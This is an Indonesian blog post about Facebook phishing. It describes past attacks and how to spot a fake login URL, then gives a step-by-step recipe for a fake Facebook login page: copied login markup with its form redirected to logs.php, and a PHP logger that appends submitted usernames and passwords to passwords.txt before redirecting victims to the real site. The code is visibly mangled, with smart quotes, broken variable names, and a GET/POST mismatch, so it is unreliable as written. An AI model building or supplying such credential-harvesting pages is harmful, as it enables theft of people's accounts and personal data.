postingan basi lagi ne,buat yang belum tau aja,begini ceritanya,Setelah di amati dengan cara seksama dan dalam tempo sesingkat-sinkatnya hehe,Beberapa Hari/Bulan/Tahun terakhir ini, Facebook yang merupakan social network (jejaring sosial) terbesar sering mendapat phising baik itu dari email, IM seperti Yahoo messenger, maupun dari pesan dari contact list Facebook sendiri.
Serangan phising terbesar menurut facebook dilakukan oleh 2 website yaitu FBStarter.com dan BAction.net beberapa waktu lalu. Meraka biasa mengirim pesan berupa kata-kata “Check this out”. Kemudian mereka mengundang korban untuk meng- klik link yang akan membawa mereka keluar dari Facebook.
Pihak Facebook menyatakan bahwa serangan tersebut berhenti setiap beberapa jam pada tiap kasusnya. Facebook juga menyatakan bahwa belum ada kepastian apakah serangan dari kedua website tersebut saling terkait atau tidak.
Facebook telah menghapus URL tersebut dari member page dan membuang URL yang ada di pesan mail. Untuk user yang telah terjebak phising ini, pihak Facebook telah mereset password mereka. Facebook juga menganjurkan para usernya untuk tidak meng-klik link yang mencurigakan serta menganjurkan para user yang telah menjadi korban untuk segera mengganti password.
Phising merupakan proses untuk mendapatkan informasi sensitif seperti username, password dan bahkan sampai detail kartu kredit dengan berpura-pura menjadi website asli.
Biasanya si pelaku memancing korbannya untuk masuk ke website yang dibuat mirip dengan website aslinya. Pada website palsu itu, si pelaku telah menyisipkan box username dan password dan meminta korban untuk login. Jadi di sini si pelaku melakukan penipuan login atau biasa di sebut fake login.
Bagaimana kita tahu kalau itu fake login ?
Untuk mengetahui itu web phising yang menggunakan fake login, kita harus teliti url untuk login di facebook itu sendiri. Untuk login, facebook strong>menggunakan url
https:// login.facebook.com/login.phpWeb phising dengan fake login
Tampilan utama Web phising dengan fake login menggunakan source code dari https://login.facebook.com/login.php yang disimpan menjadi index.html. Tapi di index.html ini kita tambahi di form dengan pemanggilan code php untuk penyimpanan username dan password yang diisikan.
form method=”POST” action=”logs.php” name=”menubar_login”
id=”menubar_login”> value=”€,´, €,´,?,?,?” /> name=”locale” value=”en_ US” />
Lihat code yang di cetak tebal tersebut, code asli dari facebook adalah
class=”login_ form_label_field”> rel=”nofollow”>Forgot your password? td> login_form_label_ field”> id=”email” name=”email” value=”" /> td> class=”inputpassword” id=”pass” name=”pass” value=”" /> class=”inputtext hidden_elem” id=”pass_placeholder” name=”pass_placeholder”
value=”" />
/ >td>class=”UILinkButton_ R”>div>
Yang tercetak tebal, yaitu :
adalah pengisian dari form tersebut kita akan diarahkan ke logs.php.
Sedangkan isi dari logs.php adalah pencatatan dari pengisian username dan password tersebut.
<?php
header(“Location:http://www.facebook.com/”);
$ handle = fopen (“passwords.txt”, “a”) ;
foreach($_GET as $variable => $value) {
fwrite($ handle, $variable);
fwrite($ handle, “=”);
fwrite($ handle, $value);
fwrite($ handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
? >
Pengisian di web phising yang menggunakan fake login facebook ini akan tersimpan di passwords.txt secara terus menerus……..
Bahaya kan……
Semoga Bermanfaat wasallam.
Tidak ada komentar:
Posting Komentar